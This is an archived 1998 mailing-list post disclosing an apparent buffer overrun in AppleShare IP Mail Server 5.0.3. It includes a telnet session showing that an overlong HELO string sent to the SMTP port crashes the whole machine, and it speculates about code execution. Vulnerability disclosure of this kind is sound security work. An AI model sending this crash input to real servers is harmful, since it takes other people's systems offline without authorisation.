AppleShare IP Mail Server

From: Chris Wedgwood (chrisat_private)
Date: Tue Apr 07 1998 - 18:11:17 PDT

  • Next message: David Luyer: "Re: AppleShare IP Mail Server"

    [Yet another buffer overrun? - I hope this isn't getting monotonous]
    I noticed this a while back but haven't seen any else mention it.
    There appears to be what looks like a buffer overrun problem with AppleShare
    IP Mail Server.
    If you connect to the SMTP port and issue a long string (say 500 bytes or
    so) the server crashes - and because its a Mac, it usually crashed the whole
    machine to the point where it needs a reboot.
    So far I've only tested against servers which emit the banner 'AppleShare IP
    Mail Server 5.0.3'
    For example:
    $ telnet some.where
    Connected to some.where.
    Escape character is '^]'.
    220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
    HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
    [ and it just hangs ]
    $ ping some.where
    [ ...nothing... ]
    Physically checking the machine shows it has `locked up' and it a reboot. I
    assume if you can cause a crash without the lockup then you might be able to
    execute code and so something useful (on a Mac?).

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